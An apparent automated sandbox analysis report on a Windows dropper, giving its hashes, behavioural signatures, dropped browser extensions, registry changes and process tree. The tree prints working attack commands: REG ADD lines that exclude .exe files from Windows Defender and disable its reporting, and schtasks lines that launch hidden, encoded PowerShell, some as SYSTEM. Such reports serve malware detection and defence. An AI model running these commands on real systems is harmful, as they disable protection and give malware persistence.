Analysis
-
max time kernel
146s -
max time network
153s -
platform
windows11-21h2_x64 -
resource
win11-20240221-en -
resource tags
arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system -
submitted
19-03-2024 19:00
Static task
static1
Behavioral task
behavioral1
Sample
497f31f97244da648bb5651ab0609e5239c0871e0d1e3b61732d3ce274f976d8.exe
Resource
win10v2004-20240226-en
General
-
Target
497f31f97244da648bb5651ab0609e5239c0871e0d1e3b61732d3ce274f976d8.exe
-
Size
7.5MB
-
MD5
680e0d71b890903dd9f296c9ec6f9323
-
SHA1
3a09a2cf14871474d9c5051b8a9b0adda9628864
-
SHA256
497f31f97244da648bb5651ab0609e5239c0871e0d1e3b61732d3ce274f976d8
-
SHA512
136bd18942e487d6f2e34637c5549f72041619aca25c5ff6173b2e94a742c242ef65de8e4898894f6ae5967eb245fa926a7f6743a8782eba3dc79757771bc39d
-
SSDEEP
196608:91OntenT5ZSWw3qbal0EFaeg4r0XBbTVT4kfb81+fSY+EuRwl:3OteT5gWcQqgXBnVT4kDoOSYmRwl
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 21 2888 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1101742937-4171729779-750941522-1000\Control Panel\International\Geo\Nation FVAhqSI.exe -
Executes dropped EXE 4 IoCs
pid Process 4628 Install.exe 1856 Install.exe 4708 hTmuITj.exe 2204 FVAhqSI.exe -
Loads dropped DLL 1 IoCs
pid Process 2888 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json FVAhqSI.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json FVAhqSI.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini FVAhqSI.exe -
Drops file in System32 directory 31 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft FVAhqSI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache FVAhqSI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA FVAhqSI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_08872284D8414653D8A6B617C1164F2D FVAhqSI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_F335A0F859C450629B87083CAA1DC971 FVAhqSI.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies FVAhqSI.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol hTmuITj.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_A2CFFC3C54D475112D9FC5039EB0095F FVAhqSI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 FVAhqSI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData FVAhqSI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content FVAhqSI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_F335A0F859C450629B87083CAA1DC971 FVAhqSI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 FVAhqSI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 FVAhqSI.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol FVAhqSI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_08872284D8414653D8A6B617C1164F2D FVAhqSI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 FVAhqSI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D4579ED561AFE0AD26F688A8C9A41CC6 FVAhqSI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA FVAhqSI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA FVAhqSI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE FVAhqSI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 FVAhqSI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA FVAhqSI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_A2CFFC3C54D475112D9FC5039EB0095F FVAhqSI.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini hTmuITj.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 FVAhqSI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D4579ED561AFE0AD26F688A8C9A41CC6 FVAhqSI.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak FVAhqSI.exe File created C:\Program Files (x86)\NEwrPvSGentU2\nkSnGdL.xml FVAhqSI.exe File created C:\Program Files (x86)\iRMzUYCAhkbMC\KposeBq.dll FVAhqSI.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi FVAhqSI.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja FVAhqSI.exe File created C:\Program Files (x86)\NEwrPvSGentU2\UtWiorPYPsQZB.dll FVAhqSI.exe File created C:\Program Files (x86)\wqRDBEtPSAXhoJHUBaR\hHOEUOV.xml FVAhqSI.exe File created C:\Program Files (x86)\iRMzUYCAhkbMC\iYXrkuO.xml FVAhqSI.exe File created C:\Program Files (x86)\DyYwGMOhU\tirYsZ.dll FVAhqSI.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak FVAhqSI.exe File created C:\Program Files (x86)\DyYwGMOhU\cJKFcgV.xml FVAhqSI.exe File created C:\Program Files (x86)\wqRDBEtPSAXhoJHUBaR\qwlPqty.dll FVAhqSI.exe File created C:\Program Files (x86)\oZARwjxMcMUn\gojQfEy.dll FVAhqSI.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi FVAhqSI.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bNoYxGgNiGReyhFIfY.job schtasks.exe File created C:\Windows\Tasks\vFsADyudLcNCFLIiL.job schtasks.exe File created C:\Windows\Tasks\DQYxzwqpnFjMWpp.job schtasks.exe File created C:\Windows\Tasks\LPyXfDhiQUyhASpny.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4076 schtasks.exe 2424 schtasks.exe 4584 schtasks.exe 744 schtasks.exe 1340 schtasks.exe 4944 schtasks.exe 1464 schtasks.exe 3796 schtasks.exe 4360 schtasks.exe 4880 schtasks.exe 2276 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume FVAhqSI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "5" FVAhqSI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer FVAhqSI.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix FVAhqSI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" FVAhqSI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" FVAhqSI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket FVAhqSI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" FVAhqSI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{ff4704ea-0000-0000-0000-d01200000000}\NukeOnDelete = "0" FVAhqSI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ FVAhqSI.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1460 powershell.EXE 1460 powershell.EXE 3280 powershell.exe 3280 powershell.exe 1944 powershell.exe 1944 powershell.exe 1864 powershell.EXE 1864 powershell.EXE 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe 2204 FVAhqSI.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1460 powershell.EXE Token: SeDebugPrivilege 3280 powershell.exe Token: SeDebugPrivilege 1944 powershell.exe Token: SeDebugPrivilege 1864 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2648 wrote to memory of 4628 2648 497f31f97244da648bb5651ab0609e5239c0871e0d1e3b61732d3ce274f976d8.exe 81 PID 2648 wrote to memory of 4628 2648 497f31f97244da648bb5651ab0609e5239c0871e0d1e3b61732d3ce274f976d8.exe 81 PID 2648 wrote to memory of 4628 2648 497f31f97244da648bb5651ab0609e5239c0871e0d1e3b61732d3ce274f976d8.exe 81 PID 4628 wrote to memory of 1856 4628 Install.exe 82 PID 4628 wrote to memory of 1856 4628 Install.exe 82 PID 4628 wrote to memory of 1856 4628 Install.exe 82 PID 1856 wrote to memory of 2300 1856 Install.exe 84 PID 1856 wrote to memory of 2300 1856 Install.exe 84 PID 1856 wrote to memory of 2300 1856 Install.exe 84 PID 1856 wrote to memory of 4320 1856 Install.exe 86 PID 1856 wrote to memory of 4320 1856 Install.exe 86 PID 1856 wrote to memory of 4320 1856 Install.exe 86 PID 2300 wrote to memory of 2312 2300 forfiles.exe 88 PID 2300 wrote to memory of 2312 2300 forfiles.exe 88 PID 2300 wrote to memory of 2312 2300 forfiles.exe 88 PID 4320 wrote to memory of 980 4320 forfiles.exe 89 PID 4320 wrote to memory of 980 4320 forfiles.exe 89 PID 4320 wrote to memory of 980 4320 forfiles.exe 89 PID 2312 wrote to memory of 2228 2312 cmd.exe 90 PID 2312 wrote to memory of 2228 2312 cmd.exe 90 PID 2312 wrote to memory of 2228 2312 cmd.exe 90 PID 980 wrote to memory of 1672 980 cmd.exe 91 PID 980 wrote to memory of 1672 980 cmd.exe 91 PID 980 wrote to memory of 1672 980 cmd.exe 91 PID 2312 wrote to memory of 1564 2312 cmd.exe 92 PID 2312 wrote to memory of 1564 2312 cmd.exe 92 PID 2312 wrote to memory of 1564 2312 cmd.exe 92 PID 980 wrote to memory of 3144 980 cmd.exe 93 PID 980 wrote to memory of 3144 980 cmd.exe 93 PID 980 wrote to memory of 3144 980 cmd.exe 93 PID 1856 wrote to memory of 1340 1856 Install.exe 94 PID 1856 wrote to memory of 1340 1856 Install.exe 94 PID 1856 wrote to memory of 1340 1856 Install.exe 94 PID 1856 wrote to memory of 1972 1856 Install.exe 96 PID 1856 wrote to memory of 1972 1856 Install.exe 96 PID 1856 wrote to memory of 1972 1856 Install.exe 96 PID 1460 wrote to memory of 2920 1460 powershell.EXE 100 PID 1460 wrote to memory of 2920 1460 powershell.EXE 100 PID 1856 wrote to memory of 2080 1856 Install.exe 105 PID 1856 wrote to memory of 2080 1856 Install.exe 105 PID 1856 wrote to memory of 2080 1856 Install.exe 105 PID 1856 wrote to memory of 2276 1856 Install.exe 107 PID 1856 wrote to memory of 2276 1856 Install.exe 107 PID 1856 wrote to memory of 2276 1856 Install.exe 107 PID 4708 wrote to memory of 3280 4708 hTmuITj.exe 110 PID 4708 wrote to memory of 3280 4708 hTmuITj.exe 110 PID 4708 wrote to memory of 3280 4708 hTmuITj.exe 110 PID 3280 wrote to memory of 3168 3280 powershell.exe 112 PID 3280 wrote to memory of 3168 3280 powershell.exe 112 PID 3280 wrote to memory of 3168 3280 powershell.exe 112 PID 3168 wrote to memory of 2424 3168 cmd.exe 113 PID 3168 wrote to memory of 2424 3168 cmd.exe 113 PID 3168 wrote to memory of 2424 3168 cmd.exe 113 PID 3280 wrote to memory of 4076 3280 powershell.exe 114 PID 3280 wrote to memory of 4076 3280 powershell.exe 114 PID 3280 wrote to memory of 4076 3280 powershell.exe 114 PID 3280 wrote to memory of 980 3280 powershell.exe 115 PID 3280 wrote to memory of 980 3280 powershell.exe 115 PID 3280 wrote to memory of 980 3280 powershell.exe 115 PID 3280 wrote to memory of 236 3280 powershell.exe 116 PID 3280 wrote to memory of 236 3280 powershell.exe 116 PID 3280 wrote to memory of 236 3280 powershell.exe 116 PID 3280 wrote to memory of 1040 3280 powershell.exe 117 PID 3280 wrote to memory of 1040 3280 powershell.exe 117
Processes
-
C:\Users\Admin\AppData\Local\Temp\497f31f97244da648bb5651ab0609e5239c0871e0d1e3b61732d3ce274f976d8.exe"C:\Users\Admin\AppData\Local\Temp\497f31f97244da648bb5651ab0609e5239c0871e0d1e3b61732d3ce274f976d8.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Users\Admin\AppData\Local\Temp\7zSA901.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4628 -
C:\Users\Admin\AppData\Local\Temp\7zSAD18.tmp\Install.exe.\Install.exe /BQLdidcPk "385118" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1856 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2300 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2312 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:2228
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1564
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:4320 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:980 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1672
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:3144
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gYYRkxtgZ" /SC once /ST 11:51:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1340
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gYYRkxtgZ"4⤵PID:1972
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gYYRkxtgZ"4⤵PID:2080
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bNoYxGgNiGReyhFIfY" /SC once /ST 19:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qeOxabDhDvCCKUygJ\MfJxEgkARsuSvOa\hTmuITj.exe\" Qp /sqsite_idINQ 385118 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2276
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1460 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:2920
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4376
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:4624
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4904
-
